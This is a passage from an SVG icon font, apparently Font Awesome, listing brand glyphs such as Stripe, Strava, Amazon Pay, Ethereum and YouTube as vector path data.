c20.2002 3.2002 43.3008 22.7998 43.3008 22.7998c0.799805 18 12.5996 61 15 67.2002c2.39941 6.2002 17.1992 6.5 18.7998 3c2.2002 -7 0.299805 -37.5996 0.299805 -37.5996l1.59961 0.5c5.90039 17.5 18.3008 31.1992 18.3008 31.1992s9.89941 9.7002 18 7.30078
c8.09961 -2.30078 5.09961 -30.4004 5.09961 -30.4004s-4.2998 -30.7002 9.40039 -32c13.6992 -1.40039 29.2998 10.7002 29.2998 10.7002s9.59961 3.89941 10.7002 -6.7998zM61.9004 188.1c0 0 6.19922 -1.89941 19.8994 7.60059
c13.7002 9.39941 16.4004 24.3994 9.10059 31.3994c-7.2002 6.90039 -28.2002 -7 -29 -39zM334.7 311.9c0 0 -15.9004 -54.5 -16.4004 -70.7002c0 0 44.5 72 40 96.2002c-4.5 24.1992 -23.5996 -25.5 -23.5996 -25.5zM357.5 173.5
c12.5996 33.0996 -3.59961 45.5 -3.59961 45.5s-23.4004 12.9004 -33.3008 -20.2002c-9.89941 -33.0996 -6.39941 -44.8994 -6.39941 -44.8994s30.7002 -13.4004 43.2998 19.5996zM442.1 188.1c0 0 15.7002 -1.09961 26.4004 14.2002s1.2998 25.5 1.2998 25.5
s-8.59961 11.1006 -19.5996 -9.09961c-11.1006 -20.1006 -8.10059 -30.6006 -8.10059 -30.6006z" />
    <glyph glyph-name="font-awesome-flag" unicode="&#xf425;" horiz-adv-x="447" 
d="M444.373 88.5762c0 -7.16797 -6.14453 -10.2402 -13.3125 -13.3125c-28.6719 -12.2881 -59.3916 -23.5518 -92.1592 -23.5518c-46.0801 0 -67.584 28.6719 -122.88 28.6719c-39.9365 0 -81.9209 -14.3359 -115.713 -29.6953
c-2.04785 -1.02441 -4.0957 -1.02441 -6.14355 -2.04883v-77.8232c0 -21.4053 -16.1221 -34.8164 -33.792 -34.8164c-19.4561 0 -34.8164 15.3604 -34.8164 34.8164v374.783c-13.3115 10.2402 -22.5273 26.624 -22.5273 45.0566c0 31.7441 25.5996 57.3438 57.3438 57.3438
s57.3438 -25.5996 57.3438 -57.3438c0 -18.4326 -8.19141 -34.8164 -22.5273 -45.0566v-31.7432c4.12402 1.37402 58.7676 28.6719 114.688 28.6719c65.2705 0 97.6758 -27.6484 126.976 -27.6484c38.9121 0 81.9209 27.6484 92.1602 27.6484
c8.19238 0 15.3604 -6.14453 15.3604 -13.3125v-240.64z" />
    <glyph glyph-name="gitter" unicode="&#xf426;" horiz-adv-x="384" 
d="M66.4004 125.5h-50.4004v322.5h50.4004v-322.5zM166.9 371.9v-435.9h-50.4004v435.9h50.4004zM267.5 371.9v-435.9h-50.4004v435.9h50.4004zM368 372v-247h-50.4004v247h50.4004z" />
    <glyph glyph-name="hooli" unicode="&#xf427;" horiz-adv-x="640" 
d="M144.5 96v16c12.2998 -6.59961 25.0996 -12.2002 38.2998 -16.7998zM202.2 101.3c29.5 -10.7002 55.3994 -13.5 75.2998 -13.2998c-24.7998 -7 -58.2002 -5.2998 -94.7002 7.2002l19.4004 0.799805v5.2998zM611.1 216.5c-16 0 -28.8994 13 -28.8994 28.9004
c0 15.8994 13 24.5 28.8994 24.5c16 0 28.9004 -8.5 28.9004 -24.5s-13 -28.9004 -28.9004 -28.9004zM582.1 96v110.5h57.9004v-110.5h-57.9004zM508.4 96v168l57.8994 27.2998v-195.3h-57.8994zM477.4 215.4c18.0996 -18.1006 16.6992 -33.8008 16.7998 -52.6006
c0 -18.7002 1.39941 -34.2998 -16.7998 -52.5c-18.1006 -18.2002 -50.4004 -17.0996 -50.4004 -17.0996s-32.2002 -1.10059 -50.4004 17.0996c-18.1992 18.2002 -16.7998 33.7998 -16.7998 52.5s-1.39941 34.4004 16.7998 52.6006
c18.1006 18.1992 50.4004 17.0996 50.4004 17.0996s32.2002 1.09961 50.4004 -17.0996zM437.6 143.5v40.4004c0 8.7998 -7.2998 10.8994 -10.6992 10.8994c-3.40039 0 -10.7002 -2.2002 -10.7002 -10.8994v-40.4004c0 -3.59961 1.7998 -12.5 10.7002 -12.5
c8.89941 0 10.6992 8.90039 10.6992 12.5zM331.4 215.4c18.1992 -18.1006 16.6992 -33.8008 16.6992 -52.3008c0 -18.6992 1.5 -34.2998 -16.6992 -52.5c-18.1006 -18.1992 -50.4004 -17.0996 -50.4004 -17.0996s-32.2002 -1.09961 -50.4004 17.0996
c-18.1992 18.2002 -16.7998 33.8008 -16.7998 52.5c0 15.6006 -0.899414 29.1006 9.2998 43.7002c-16 11.7998 -58 37.4004 -99.8994 58.2998v-54.2998c8 13.7002 22.7002 22 38.5 21.9004c27.2002 0 40.5996 -18.7002 40.5996 -37.4004v-93.8994
c-20.3994 7.5 -39.7002 17.3994 -57.7002 29.5996v48.7002c0 8.09961 -1.5 15 -10.5996 15s-10.7998 -11.2998 -10.7998 -18.2002v-29.7998l-4.5 3.59961c-22.9004 18.9004 -40.2998 35.6006 -53.4004 50.2998v-31c11 -9.7998 23.6006 -20.1992 38.4004 -31.3994
c6.39941 -4.90039 12.8994 -9.40039 19.3994 -13.6006v-28.5996h-57.8994v73.7002c-86.7002 78 -61.7998 110.8 -61.7998 110.8c8.2998 18.2998 42.8994 22.2002 97.2998 0.0996094l22.5 10.6006v-20.7002c29.5996 -14.5996 63.8994 -31.5 102.1 -61.0996
c1.60059 2.09961 3.40039 4.09961 5.2998 6c18.2002 18.1992 50.4004 17.0996 50.4004 17.0996s32.2002 1.09961 50.4004 -17.0996zM65.2002 264l29.2002 13.7002c-26.9004 10.0996 -50.9004 13.5 -64.4004 2.09961c-3.7002 -3.09961 -13.5 -24.5996 35.2002 -79.0996
v63.2998zM291.7 143.5v40.4004c0 8.7998 -7.2998 10.8994 -10.7002 10.8994s-10.7002 -2.2002 -10.7002 -10.8994v-40.4004c0 -3.59961 1.7998 -12.5 10.7002 -12.5s10.7002 8.90039 10.7002 12.5z" />
    <glyph glyph-name="strava" unicode="&#xf428;" horiz-adv-x="369" 
d="M151.4 448l150.199 -292h-88.5l-61.6992 116.1l-62.2002 -116.1h-89.2002zM301.6 156h67.6006l-111.5 -220l-112.2 220h67.5996l44.6006 -88.2002z" />
    <glyph glyph-name="stripe" unicode="&#xf429;" horiz-adv-x="640" 
d="M165 303.3l0.0996094 -38.5h33.7002v-37.7998h-33.7002v-63.2002c0 -26.2002 28 -18 33.7002 -15.7002v-33.7998c-5.89941 -3.2002 -16.5996 -5.89941 -31.2002 -5.89941c-26.2998 0 -46.0996 17 -46.0996 43.2998l0.200195 142.399zM254.1 251.7
c10.4004 19.0996 31.1006 15.2002 37.1006 13.0996v-40.7998c-5.7002 1.7998 -23.4004 4.5 -33.9004 -9.2998v-103.101h-44.2998v153.2h38.4004zM346.4 324v-36.2002l-44.6006 -9.5v36.2002zM44.9004 219.7c0 -20 67.8994 -10.5 67.8994 -63.4004
c0 -32 -25.3994 -47.7998 -62.2998 -47.7998c-15.2998 0 -32 3 -48.5 10.0996v40c14.9004 -8.09961 33.9004 -14.1992 48.5996 -14.1992c9.90039 0 17 2.69922 17 10.8994c0 21.2002 -67.5 13.2002 -67.5 62.4004c0 31.3994 24 50.2002 60 50.2002
c14.7002 0 29.4004 -2.30078 44.1006 -8.10059v-41.7998c-13.5 7.2998 -30.7002 11.4004 -44.2002 11.4004c-9.2998 -0.100586 -15.0996 -2.80078 -15.0996 -9.7002zM640 186.4c0 -4.30078 -0.400391 -13.6006 -0.599609 -15.9004h-86.9004
c2 -20.7998 17.2002 -26.9004 34.5 -26.9004c17.5996 0 31.5 3.7002 43.5996 9.80078v-33.4004c-12.0996 -6.7002 -28 -11.5 -49.1992 -11.5c-43.2002 0 -73.5 24.7002 -73.5 78.2002c0 45.2002 25.6992 81.0996 67.8994 81.0996s64.2002 -35.8994 64.2002 -81.3994z
M552.1 203.2h45.9004c0 20 -11.5996 28.3994 -22.5 28.3994c-11.0996 0 -23.4004 -8.39941 -23.4004 -28.3994zM439.2 267.8c31.2002 0 60.5996 -28.0996 60.5 -79.7002c0 -56.3994 -29 -79.5996 -60.7998 -79.5996c-15.5 0 -25 6.5 -31.4004 11.2002l-0.0996094 -50.2002
l-44.4004 -9.40039v204.801h39.0996l2.30078 -11c6.19922 5.69922 17.3994 13.8994 34.7998 13.8994zM428.6 145.3c16.5 0 27.5 17.9004 27.4004 41.7998c0 23.2002 -11.2002 41.4004 -27.4004 41.4004c-10.1992 0 -16.5996 -3.7002 -21.1992 -8.7998l0.299805 -66
c4.2998 -4.60059 10.5 -8.40039 20.8994 -8.40039zM301.9 111.6v153.2h44.5996v-153.2h-44.5996z" />
    <glyph glyph-name="stripe-s" unicode="&#xf42a;" horiz-adv-x="362" 
d="M144.3 293.4c0 -64.2002 218 -33.7002 218 -203.9c0 -102.6 -81.7002 -153.6 -200.3 -153.6c-49.2002 0 -103 9.59961 -156 32.3994v128.5c47.9004 -26 108.9 -45.5 156.1 -45.5c31.8008 0 54.7002 8.5 54.7002 34.9004c0 68.0996 -216.8 42.5 -216.8 200.399
c0 101 77.0996 161.4 192.8 161.4c47.2998 0 94.5 -7.2002 141.8 -26.0996v-134.301c-43.3994 23.4004 -98.5 36.7002 -141.899 36.7002c-29.7998 0 -48.4004 -8.59961 -48.4004 -30.8994z" />
    <glyph glyph-name="typo3" unicode="&#xf42b;" horiz-adv-x="433" 
d="M171.7 369.6c0 -66.3994 83.3994 -264.899 140.6 -264.899c6.90039 0 11.5 0 18.5 2.2998c-49.3994 -79.5 -110.399 -139 -146.7 -139c-77.2998 0 -184.1 234 -184.1 337.5c0 16.2998 3.90039 29.4004 9.2998 37.0996c27 32.4004 106.8 57.9004 176.3 66.4004
c-8.5 -7 -13.8994 -14.7002 -13.8994 -39.4004zM294.5 416c71.7998 0 138.8 -11.5996 138.8 -52.5c0 -82.5996 -52.5 -182.3 -78.7998 -182.3c-47.9004 0 -101.7 132.1 -101.7 198.5c0 30.8994 11.6006 36.2998 41.7002 36.2998z" />
    <glyph glyph-name="amazon-pay" unicode="&#xf42c;" horiz-adv-x="611" 
d="M0 122.8c2.2998 4.2002 5.2002 4.90039 9.7002 2.5c10.3994 -5.59961 20.5996 -11.3994 31.2002 -16.7002c40.6992 -20.3994 83.1992 -35.5996 127.399 -46.2998c20.9004 -5 41.9004 -9 63.2002 -11.7998c31.5 -4.2002 63.2002 -6 95 -5.2002
c17.4004 0.400391 34.7998 1.7998 52.0996 3.7998c56.4004 6.7002 110.9 20.8008 163.301 42.8008c2.89941 1.19922 5.89941 2 9.09961 1.19922c6.7002 -1.7998 9 -9 4.09961 -13.8994c-2.7998 -2.7998 -6.2998 -5.10059 -9.59961 -7.40039
c-30.7002 -21.0996 -64.2002 -36.3994 -99.5996 -47.8994c-24.6006 -7.90039 -49.6006 -13.8008 -75.1006 -17.6006c-17.5996 -2.59961 -35.3994 -4.39941 -53.2002 -4.7998c-0.799805 0 -1.69922 -0.200195 -2.5 -0.299805h-21.0996
c-0.799805 0.0996094 -1.7002 0.299805 -2.5 0.299805c-3.59961 0.200195 -7.2002 0.299805 -10.7002 0.400391c-16.8994 0.699219 -33.7002 2.59961 -50.3994 5.2998c-27.4004 4.5 -54.2002 11.3994 -80.4004 20.8994c-54.0996 19.6006 -102.6 48.6006 -145.6 87
c-1.80078 1.60059 -3 3.80078 -4.40039 5.7002v2zM158 383c2.7998 0 5.5 0 8.2998 -0.0996094c3.2998 -0.5 6.60059 -0.800781 9.7998 -1.5c21.3008 -4.40039 35.4004 -17.3008 43.9004 -36.9004c6.90039 -15.9004 8.59961 -32.7002 8.09961 -49.7998
c-0.399414 -15.4004 -3.2998 -30.2002 -10.2998 -44.1006c-9.2002 -18.3994 -23.3994 -30.8994 -43.7998 -34.8994c-22.5 -4.40039 -43.0996 0.5 -61 15.3994c-0.5 0.5 -1.09961 1 -2.2002 1.90039v-72.4004c0 -1 0 -2 -0.0996094 -3c-0.299805 -3 -2.10059 -5 -5 -5
c-7 -0.0996094 -14.1006 -0.0996094 -21.1006 0c-2.89941 0.100586 -4.69922 2 -4.89941 5c-0.100586 1 -0.100586 2 -0.100586 3v209.301c0 6.89941 1.30078 8.19922 8.2002 8.19922h11.5c4.60059 0 6.90039 -2 7.60059 -6.59961c0.5 -2.7002 0.899414 -5.5 1.2998 -8.2002
c0 -0.399414 0.200195 -0.899414 0.399414 -1.39941c2.5 1.89941 4.7002 3.69922 7.10059 5.39941c11.3994 8.2002 24 13.4004 38 15.1006c1.39941 0.199219 2.89941 0.399414 4.2998 0.599609zM110.6 341.1c0.100586 -14.0996 0 -28.0996 0 -42.0996
c0 -14.0996 0.100586 -28.0996 0 -42.2002c0 -1.59961 0.5 -2.39941 1.7002 -3.2998c11.2002 -7.90039 23.4004 -13.2998 37.4004 -13.9004c20.2002 -0.899414 35.7998 7.2002 42.5996 28.5c3.2002 10 4 20.2002 4 30.6006c0 11.2002 -1 22.2998 -4.89941 33
c-6.40039 17.5 -18.6006 24.7998 -33.5 25.8994c-16.8008 1.30078 -31.9004 -3.69922 -45.6006 -13.1992c-1.2998 -0.900391 -1.7002 -1.80078 -1.7002 -3.30078zM316.3 383c4 0 8 0 11.9004 0.0996094c3.59961 -0.5 7.2002 -0.799805 10.7998 -1.2998
c7.7002 -1.09961 15.0996 -3.09961 21.7998 -7.09961c11.6006 -6.90039 17.1006 -17.5 19 -30.4004c0.700195 -4.2998 0.900391 -8.59961 0.900391 -12.8994v-106c0 -0.900391 0 -1.90039 -0.100586 -2.80078c-0.299805 -2.7998 -2.09961 -4.59961 -4.7998 -4.69922
c-5.39941 -0.100586 -10.8994 -0.100586 -16.2998 0c-2.90039 0.0996094 -4.7998 2.09961 -5.40039 5.19922c-0.699219 3.60059 -1.19922 7.2002 -1.7998 11c-0.700195 -0.399414 -1.2002 -0.699219 -1.59961 -1.09961
c-11.7998 -9.7002 -25.2002 -16.0996 -40.2998 -18.4004c-13.1006 -2 -26 -1.19922 -37.9004 5.40039c-12.4004 6.90039 -19.4004 17.7002 -21.4004 31.7002c-1.5 10.5 -0.799805 20.8994 3.90039 30.7002c6.09961 12.5996 16.5 20.3994 29.4004 24.8994
c10.7998 3.7998 22 4.5 33.2998 3.90039c10.8994 -0.600586 21.5 -2.40039 32 -4.90039c0.399414 -0.0996094 0.799805 0 1.2998 -0.0996094c0.0996094 0.5 0.200195 1 0.200195 1.39941c-0.100586 8.30078 0 16.6006 -0.299805 24.9004
c-0.200195 5.90039 -1.60059 11.5996 -5.30078 16.4004c-4.19922 5.5 -10.2998 7.39941 -16.7998 8.39941c-12.5 1.90039 -24.8994 0.900391 -37.2002 -1.39941c-7.89941 -1.5 -15.6992 -3.7002 -23.5 -5.7002c-4.69922 -1.2002 -6.69922 0.0996094 -6.7998 4.89941
c-0.0996094 3.30078 0.100586 6.60059 0 9.90039c-0.0996094 3.90039 1.7002 6.5 5.2998 7.7002c5.90039 2 11.8008 4.2002 17.9004 5.7998c9.5 2.40039 19.0996 3.59961 28.9004 4.09961c0.899414 0.100586 1.89941 0.300781 2.89941 0.400391zM351.3 255.3
c-0.0996094 4.7002 0 9.40039 0.100586 14.1006c0 4.7998 -0.100586 9.5 0 14.2998c0 1.59961 -0.5 2.39941 -2.10059 2.59961c-8.39941 1.10059 -16.5996 2.7002 -25 3.40039c-8.2998 0.799805 -16.7002 0.399414 -24.7998 -2.2002
c-8 -2.59961 -13.9004 -7.2998 -16.4004 -15.5996c-1.89941 -6.40039 -1.89941 -13 0.100586 -19.4004s6.09961 -10.7998 12.3994 -13.2998c5.40039 -2.2002 11.1006 -2.40039 16.8008 -1.7998c13.8994 1.39941 26.1992 6.7998 37.3994 14.8994
c1.10059 0.799805 1.5 1.7002 1.5 3zM611.2 125.9v-17.3008c-0.700195 -3.59961 -1.2998 -7.2998 -2.10059 -10.8994c-4.39941 -20.2998 -11.8994 -39.2002 -24.6992 -55.6006c-3.80078 -4.7998 -8.30078 -9.09961 -12.7002 -13.3994
c-1.2002 -1.2002 -3.10059 -2.10059 -4.7998 -2.5c-2.90039 -0.700195 -4.60059 1.2002 -4.10059 4.09961c0.200195 1 0.600586 2 1 3c5.7998 14.7998 11.7002 29.7002 15.7998 45.1006c2.10059 7.59961 3.90039 15.2998 3.5 23.2998
c-0.199219 5.2002 -2.5 9 -7.59961 10.3994c-4.7002 1.30078 -9.59961 2.40039 -14.4004 2.7002c-11.3994 0.900391 -22.8994 0.200195 -34.2998 -0.899414c-7.7998 -0.800781 -15.5 -1.7002 -23.2998 -2.5c-0.700195 -0.100586 -1.5 -0.100586 -2.2002 -0.100586
c-1.5 -0.0996094 -3.2002 0.299805 -3.59961 1.7998c-0.400391 1.2002 -0.200195 2.90039 0.5 4c0.899414 1.40039 2.2998 2.5 3.7002 3.5c12.0996 8.30078 25.6992 12.9004 40 15.6006c13 2.39941 26.0996 3 39.1992 1.89941
c7.10059 -0.599609 14.2002 -1.59961 21 -3.89941c4.30078 -1.40039 8.10059 -3.2998 9.10059 -8.2998zM479.1 249.1c0.300781 -0.699219 0.5 -1.2998 0.900391 -2.39941c2.59961 7.7002 5.2002 15 7.7002 22.2002c11.5996 33.3994 23.2002 66.6992 34.7998 100
c0.5 1.39941 1.09961 2.69922 1.59961 4.09961c1.40039 3.59961 4 5.2002 7.7002 5.2002c6.60059 0 13.2998 0.0996094 19.9004 0c2.7998 0 4.09961 -1.60059 3.7002 -4.40039c-0.300781 -1.89941 -0.900391 -3.7002 -1.60059 -5.5
c-23.5 -59.8994 -46.8994 -119.8 -70.5996 -179.6c-2.5 -6.2998 -5.7002 -12.5 -9.2002 -18.4004c-8.7998 -14.8994 -22.4004 -21.7998 -39.5 -21.3994c-5.59961 0.0996094 -11.2998 1 -16.9004 2c-5.39941 0.899414 -7.2998 3.39941 -7.39941 8.89941
c-0.100586 3.2998 -0.100586 6.60059 0 9.90039c0.0996094 3.5 1.7998 5 5.2002 4.7998c2.5 -0.200195 5 -0.799805 7.5 -1c5.19922 -0.5 10.2998 -0.299805 15.3994 1.09961c7.2002 1.90039 12.2002 6.80078 15.2002 13.3008c3.40039 7.2998 6 15 9.2998 22.2998
c1.90039 4.2002 1.5 7.7002 -0.200195 11.7998c-19.7998 48.4004 -39.5 97 -59.0996 145.5c-0.799805 2 -1.40039 4 -1.90039 6.09961c-0.5 2.5 0.700195 4.5 3.2002 4.5c7.7002 0.100586 15.2998 0 22.9004 -0.0996094c3.2002 0 5.2998 -1.90039 6.39941 -4.7998
c2.10059 -5.60059 4.30078 -11.2002 6.30078 -16.9004c12.8994 -35.7002 25.7998 -71.5 38.6992 -107.2z" />
    <glyph glyph-name="cc-amazon-pay" unicode="&#xf42d;" horiz-adv-x="576" 
d="M124.7 246.2c0.0996094 11.7998 0 23.5 0 35.2998v35.2998c0 1.2998 0.399414 2 1.39941 2.7002c11.5 8 24.1006 12.0996 38.2002 11.0996c12.5 -0.899414 22.7002 -7 28.1006 -21.6992c3.2998 -8.90039 4.09961 -18.2002 4.09961 -27.7002
c0 -8.7002 -0.700195 -17.2998 -3.40039 -25.6006c-5.69922 -17.7998 -18.6992 -24.6992 -35.6992 -23.8994c-11.7002 0.5 -21.9004 5 -31.4004 11.7002c-0.900391 0.799805 -1.40039 1.59961 -1.2998 2.7998zM279.6 231.6c-5.19922 2 -8.7998 5.7002 -10.3994 11.2002
c-1.7002 5.40039 -1.7002 10.7998 -0.100586 16.2002c2 6.90039 7 10.9004 13.7002 13.0996c6.7998 2.2002 13.7998 2.5 20.7998 1.90039c7 -0.700195 13.9004 -2 20.9004 -2.90039c1.40039 -0.199219 1.7998 -0.799805 1.7998 -2.19922c-0.0996094 -4 0 -8 0 -12
c0 -3.90039 -0.0996094 -7.90039 0 -11.8008c0 -1.19922 -0.399414 -1.89941 -1.2998 -2.5c-9.40039 -6.7998 -19.7002 -11.2998 -31.2998 -12.5c-4.7998 -0.5 -9.5 -0.299805 -14.1006 1.5zM576 368v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352
c0 26.5 21.5 48 48 48h480c26.5 0 48 -21.5 48 -48zM368.5 344.1c0.400391 -1.69922 0.900391 -3.39941 1.59961 -5.09961c16.5 -40.5996 32.9004 -81.2998 49.5 -121.9c1.40039 -3.5 1.7002 -6.39941 0.200195 -9.89941
c-2.7998 -6.2002 -4.89941 -12.6006 -7.7998 -18.7002c-2.59961 -5.5 -6.7002 -9.5 -12.7002 -11.2002c-4.2002 -1.09961 -8.5 -1.2998 -12.8994 -0.899414c-2.10059 0.199219 -4.2002 0.699219 -6.30078 0.799805c-2.7998 0.200195 -4.19922 -1.10059 -4.2998 -4
c-0.0996094 -2.7998 -0.0996094 -5.60059 0 -8.2998c0.100586 -4.60059 1.60059 -6.7002 6.2002 -7.5c4.7002 -0.800781 9.40039 -1.60059 14.2002 -1.7002c14.2998 -0.299805 25.7002 5.39941 33.0996 17.8994c2.90039 4.90039 5.60059 10.1006 7.7002 15.4004
c19.7998 50.0996 39.5 100.3 59.2002 150.5c0.599609 1.5 1.09961 3 1.2998 4.59961c0.400391 2.40039 -0.700195 3.60059 -3.09961 3.7002c-5.60059 0.100586 -11.1006 0 -16.7002 0c-3.10059 0 -5.2998 -1.39941 -6.40039 -4.2998
c-0.399414 -1.09961 -0.899414 -2.2998 -1.2998 -3.40039l-29.0996 -83.6992c-2.10059 -6.10059 -4.2002 -12.1006 -6.5 -18.6006c-0.400391 0.900391 -0.600586 1.40039 -0.800781 1.90039c-10.7998 29.8994 -21.5996 59.8994 -32.3994 89.7998
c-1.7002 4.7002 -3.5 9.5 -5.2998 14.2002c-0.900391 2.5 -2.7002 4 -5.40039 4c-6.40039 0.0996094 -12.7998 0.200195 -19.2002 0.0996094c-2.2002 0 -3.2998 -1.59961 -2.7998 -3.7002zM242.4 242c1.69922 -11.7002 7.59961 -20.7998 18 -26.5996
c9.89941 -5.5 20.6992 -6.2002 31.6992 -4.60059c12.7002 1.90039 23.9004 7.2998 33.8008 15.5c0.399414 0.299805 0.799805 0.600586 1.39941 1c0.5 -3.2002 0.900391 -6.2002 1.5 -9.2002c0.5 -2.59961 2.10059 -4.2998 4.5 -4.39941
c4.60059 -0.100586 9.10059 -0.100586 13.7002 0c2.2998 0.0996094 3.7998 1.59961 4 3.89941c0.0996094 0.800781 0.0996094 1.60059 0.0996094 2.30078v88.7998c0 3.59961 -0.199219 7.2002 -0.699219 10.7998c-1.60059 10.7998 -6.2002 19.7002 -15.9004 25.4004
c-5.59961 3.2998 -11.7998 5 -18.2002 5.89941c-3 0.400391 -6 0.700195 -9.09961 1.10059h-10c-0.799805 -0.100586 -1.60059 -0.300781 -2.5 -0.300781c-8.2002 -0.399414 -16.2998 -1.39941 -24.2002 -3.5c-5.09961 -1.2998 -10 -3.19922 -15 -4.89941
c-3 -1 -4.5 -3.2002 -4.40039 -6.5c0.100586 -2.7998 -0.0996094 -5.60059 0 -8.2998c0.100586 -4.10059 1.80078 -5.2002 5.7002 -4.10059c6.5 1.7002 13.1006 3.5 19.7002 4.7998c10.2998 1.90039 20.7002 2.7002 31.0996 1.2002
c5.40039 -0.799805 10.5 -2.39941 14.1006 -7c3.09961 -4 4.2002 -8.7998 4.39941 -13.7002c0.300781 -6.89941 0.200195 -13.8994 0.300781 -20.7998c0 -0.399414 -0.100586 -0.700195 -0.200195 -1.2002c-0.400391 0 -0.799805 0 -1.10059 0.100586
c-8.7998 2.09961 -17.6992 3.59961 -26.7998 4.09961c-9.5 0.5 -18.8994 -0.0996094 -27.8994 -3.2002c-10.8008 -3.7998 -19.5 -10.2998 -24.6006 -20.7998c-4.09961 -8.2998 -4.59961 -17 -3.39941 -25.7998zM98.7002 341.1v-175.3c0 -0.799805 0 -1.7002 0.0996094 -2.5
c0.200195 -2.5 1.7002 -4.09961 4.10059 -4.2002c5.89941 -0.0996094 11.7998 -0.0996094 17.6992 0c2.5 0 4 1.7002 4.10059 4.10059c0.0996094 0.799805 0.0996094 1.7002 0.0996094 2.5v60.7002c0.900391 -0.700195 1.40039 -1.2002 1.90039 -1.60059
c15 -12.5 32.2002 -16.5996 51.0996 -12.8994c17.1006 3.39941 28.9004 13.8994 36.7002 29.1992c5.7998 11.6006 8.2998 24.1006 8.7002 37c0.5 14.3008 -1 28.4004 -6.7998 41.7002c-7.10059 16.4004 -18.9004 27.2998 -36.7002 30.9004
c-2.7002 0.599609 -5.5 0.799805 -8.2002 1.2002h-7c-1.2002 -0.200195 -2.40039 -0.300781 -3.59961 -0.5c-11.7002 -1.40039 -22.3008 -5.80078 -31.8008 -12.7002c-2 -1.40039 -3.89941 -3 -5.89941 -4.5c-0.100586 0.5 -0.299805 0.799805 -0.400391 1.2002
c-0.399414 2.2998 -0.700195 4.59961 -1.09961 6.89941c-0.600586 3.90039 -2.5 5.5 -6.40039 5.60059h-9.7002c-5.89941 0.0996094 -6.89941 -1 -6.89941 -6.80078zM493.6 109c-2.69922 0.700195 -5.09961 0 -7.59961 -1c-43.9004 -18.4004 -89.5 -30.2002 -136.8 -35.7998
c-14.5 -1.7002 -29.1006 -2.7998 -43.7002 -3.2002c-26.5996 -0.700195 -53.2002 0.799805 -79.5996 4.2998c-17.8008 2.40039 -35.5 5.7002 -53 9.90039c-37 8.89941 -72.7002 21.7002 -106.7 38.7998c-8.7998 4.40039 -17.4004 9.2998 -26.1006 14
c-3.7998 2.09961 -6.19922 1.5 -8.19922 -2.09961v-1.7002c1.19922 -1.60059 2.19922 -3.40039 3.69922 -4.7998c36 -32.2002 76.6006 -56.5 122 -72.9004c21.9004 -7.90039 44.4004 -13.7002 67.3008 -17.5c14 -2.2998 28 -3.7998 42.1992 -4.5
c3 -0.0996094 6 -0.200195 9 -0.400391c0.700195 0 1.40039 -0.199219 2.10059 -0.299805h17.7002c0.699219 0.100586 1.39941 0.299805 2.09961 0.299805c14.9004 0.400391 29.7998 1.80078 44.5996 4c21.4004 3.2002 42.4004 8.10059 62.9004 14.7002
c29.5996 9.60059 57.7002 22.4004 83.4004 40.1006c2.7998 1.89941 5.69922 3.7998 8 6.19922c4.2998 4.40039 2.2998 10.4004 -3.30078 11.9004zM544 136.7c-0.799805 4.2002 -4 5.7998 -7.59961 7c-5.7002 1.89941 -11.6006 2.7998 -17.6006 3.2998
c-11 0.900391 -22 0.400391 -32.7998 -1.59961c-12 -2.2002 -23.4004 -6.10059 -33.5 -13.1006c-1.2002 -0.799805 -2.40039 -1.7998 -3.09961 -3c-0.600586 -0.899414 -0.700195 -2.2998 -0.5 -3.39941c0.299805 -1.30078 1.69922 -1.60059 3 -1.5
c0.599609 0 1.19922 0 1.7998 0.0996094l19.5 2.09961c9.59961 0.900391 19.2002 1.5 28.7998 0.800781c4.09961 -0.300781 8.09961 -1.2002 12 -2.2002c4.2998 -1.10059 6.2002 -4.40039 6.40039 -8.7002c0.299805 -6.7002 -1.2002 -13.0996 -2.90039 -19.5
c-3.5 -12.9004 -8.2998 -25.4004 -13.2998 -37.7998c-0.299805 -0.799805 -0.700195 -1.7002 -0.799805 -2.5c-0.400391 -2.5 1 -4 3.39941 -3.5c1.40039 0.299805 3 1.09961 4 2.09961c3.7002 3.60059 7.5 7.2002 10.6006 11.2002
c10.6992 13.7998 17 29.5996 20.6992 46.5996c0.700195 3 1.2002 6.10059 1.7002 9.10059c0.200195 4.7002 0.200195 9.59961 0.200195 14.5z" />
    <glyph glyph-name="ethereum" unicode="&#xf42e;" horiz-adv-x="320" 
d="M311.9 187.2l-151.9 -92.7998l-152 92.7998l152 260.8zM160 64.5996l152 92.8008l-152 -221.4l-152 221.4z" />
    <glyph glyph-name="korvue" unicode="&#xf42f;" horiz-adv-x="446" 
d="M386.5 414c32.7002 0 59.5 -26.7998 59.5996 -59.5v-327c0 -32.7002 -26.5 -59.5 -59.5 -59.5h-327.1c-32.7002 0 -59.5 26.7998 -59.5 59.4004v327.1c0 32.7002 26.7998 59.5 59.5 59.5h327zM87.0996 327.2v-132h187.5l81.2002 132h-110.899l-61.8008 -116v116h-96z
M248.9 55.0996h118.399l-88.5996 130.801h-191.5v-130.801h96v113.601z" />
    <glyph glyph-name="elementor" unicode="&#xf430;" 
d="M425.6 416c12.4004 0 22.4004 -10 22.4004 -22.4004v-403.199c0 -12.4004 -10 -22.4004 -22.4004 -22.4004h-403.199c-12.4004 0 -22.4004 10 -22.4004 22.4004v403.199c0 12.4004 10 22.4004 22.4004 22.4004h403.199zM164.3 92.5v199h-39.7998v-199h39.7998z
M323.6 92.5v39.7998h-119.5v-39.7998h119.5zM323.6 172.1v39.8008h-119.5v-39.8008h119.5zM323.6 251.8v39.7998h-119.5v-39.7998h119.5z" />
    <glyph glyph-name="youtube-square" unicode="&#xf431;" 
d="M186.8 245.9l95.2002 -54.1006l-95.2002 -54.0996v108.2zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM406 191.7c0 0 0 59.5996 -7.59961 88.2002
c-4.2002 15.7998 -16.5 28.1992 -32.2002 32.3994c-28.2998 7.7002 -142.2 7.7002 -142.2 7.7002s-113.9 0 -142.2 -7.7002c-15.7002 -4.2002 -28 -16.5996 -32.2002 -32.3994c-7.59961 -28.5 -7.59961 -88.2002 -7.59961 -88.2002s0 -59.6006 7.59961 -88.2002
c4.2002 -15.7998 16.5 -27.7002 32.2002 -31.9004c28.2998 -7.59961 142.2 -7.59961 142.2 -7.59961s113.9 0 142.2 7.7002c15.7002 4.2002 28 16.0996 32.2002 31.8994c7.59961 28.5 7.59961 88.1006 7.59961 88.1006z" />
    <glyph glyph-name="flipboard" unicode="&#xf44d;" 
